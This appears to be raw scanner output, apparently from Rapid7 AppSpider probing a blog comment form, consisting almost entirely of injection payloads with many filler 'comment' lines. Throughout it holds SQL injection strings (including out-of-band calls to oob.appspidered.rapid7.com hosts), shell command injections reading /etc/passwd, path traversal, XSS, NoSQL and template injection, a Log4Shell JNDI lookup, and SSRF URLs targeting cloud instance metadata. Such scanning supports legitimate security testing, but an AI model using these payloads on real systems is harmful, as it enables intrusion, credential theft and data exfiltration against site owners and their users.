comment’;+exec+master..xp_dirtree+”//68b6a415d86d7632b9ecf0099191b3d1e82f007a.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’7e666a95949c5f59121865f96773f9fea038f1f7.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\4838690007e16c802e97f9108fb17b2f7a3c9e6a.oob.appspidered.rapid7.com\\a’#
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://fde76c5da47eb04b3607be41d6bf08c65f21c3ef.oob.appspidered.rapid7.com/’)+END)–
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(53625,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment
comment
comment
comment
comment
comment
comment
comment
Zaproxy dolore alias impedit expedita quisquam.
commentx70n063q
x70045xl'”x70045xl
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
x7r44sjr
x7sohh9k
x7s3gwc4: x7s3gwc4
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7y2unln
comment&& echo foobar x7zgk3kh
comment| echo foobar x7zux0k1
comment| echo foobar x7z9axlo|
comment< echo foobar x70oabo8
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
comment
;TIMEOUT /T 10 /NOBREAK;
Distinction.”});alert(15869212);({“qualification”:”MSc”,”grade”:”Distinction”.
‘.phpinfo().’
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
*
|
comment|
&
comment&
comment)
!comment
comment
comment
comment
comment
comment
http://localhost:22/
1e309
comment”}
comment”}, {x750qje9:{$meta: “textScore
comment’) OR (‘1’=’1
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx7ei2iso
comment
comment
comment
comment’;+exec+master..xp_dirtree+”//68b6a415d86d7632b9ecf0099191b3d1e82f007a.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’7e666a95949c5f59121865f96773f9fea038f1f7.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\4838690007e16c802e97f9108fb17b2f7a3c9e6a.oob.appspidered.rapid7.com\\a’#
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://fde76c5da47eb04b3607be41d6bf08c65f21c3ef.oob.appspidered.rapid7.com/’)+END)–
http://appspidered.rapid7.com/xss/script/5dadef315cce42ce17b223264199264dc28a8826
http://appspidered.rapid7.com/xss/script/23dbc24d7faaa9f806d4345329d1944ef44fc07a
https://appspidered.rapid7.com/xss/script/a9025b8345c338512453c7dcc4f1a031cafae1c0
https://appspidered.rapid7.com/xss/script/9c7e59878f49444d6478c048ecc7c0f90f8bfdce
http://appspidered.rapid7.com/xss/script/c004b16afc1c87385a48a3b31694502f9b198ca4
http://appspidered.rapid7.com/xss/script/c1de42c2582ad53b3c4bd0c8161a89155f9d4067
https://appspidered.rapid7.com/xss/script/488b184cfee98999d5420e9aa43e9b39923faf23
https://appspidered.rapid7.com/xss/script/20efe4e7ed351f25b2e5c39e4b88cff7d226fc0a
appspidered.rapid7.com/xss/script/b394fe762e176561bc5a598d86b7379c7c514676
appspidered.rapid7.com/xss/script/b0a8eb16d54c939a4ab74e0ac94033751a5a2036
wp-comments-post.php
/etc/passwd
C:\WINDOWS\system32\drivers\etc\hosts
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
\.
http://appspidered.rapid7.com/
appspidered.rapid7.com/
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
../../../../../../../../../../etc/hosts.
c:\..
file:/etc/passwd
file:/wp-comments-post.php
file:WEB-INF/web.xml
noexistnoexist
/.
http://localhost:22/
package.json.bak
package.json.bak%00
../wp-config.php
/../../../../../../../../../../vendor.js
${applicationScope}
{{ 58719 * 21973 }}
x7zppv9e
x7zy20ki
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment’ && ‘1’==’0
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
‘comment
comment’
comment”
comment%’
comment%u0027
comment%”
comment%u0022
1e309
%u2018comment
%u201acomment
%u201ccomment
— comment
/*comment
comment” UNION ALL select NULL —
comment$0
comment|/bin/cat /etc/passwd
comment;/etc/hosts
comment;/usr/bin/id
type c:\boot.ini
echo foobar x7da50pa
comment| echo foobar x7dmej9r|
netstat -na
comment|netstat -na|
comment<netstat -na
comment|ping -h
comment<ping -h
comment|$LANG
comment|$LANG|
;ping localhost -c 21;
commentcommentcomment
655321
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
${jndi:ldap://aa547ecce90633e553f7ed0f181e1e7e2462c750.oob.appspidered.rapid7.${lower:COM}}
*
comment|
comment)
https://example.com/
ftp://example.com/
example.com/
https://example.com/comment
alert(3048830)
alert(3097995)
“>alert(3184028)
“>alert(3274164)
‘>alert(3323329)
‘>alert(3663357)
“>
“>
“>
‘>
{constructor.constructor(4171362)}
{constructor.constructor(4232817)}
{constructor.constructor(4298368)}
comment%27
comment%22
a
b
char(0x27)char(0x27)comment
%u2019comment
%u201dcomment
commentʼ
{“comment
{comment
comment{
comment”}
comment’}
comment/
comment/”
comment”}, {x7yre5id:{$meta: “textScore
comment”}}, {x7y1eqwh:{$meta: “textScore
comment’ AND ‘1’=’0
comment’ AND 1=0/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1)–
comment”) AND (“1″”=”0
comment’ AND 1=0 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”0
comment’ OR 1=1 —
comment” OR “1”=”1
comment”) OR (“1″=”0
comment’ OR 1=0 ##
comment’ OR 1=0 —
comment’) AND ‘1’ in (‘0
comment”) AND “1” in (“1
comment”) OR “1” in (“0
comment ASC
1, comment ASC
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(53625,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
comment’);WAITFOR DELAY ’00:00:00′–
comment AND pg_sleep(00) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
Distinction.”});alert(9505375);({“qualification”:”MSc”,”grade”:”Distinction”.
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment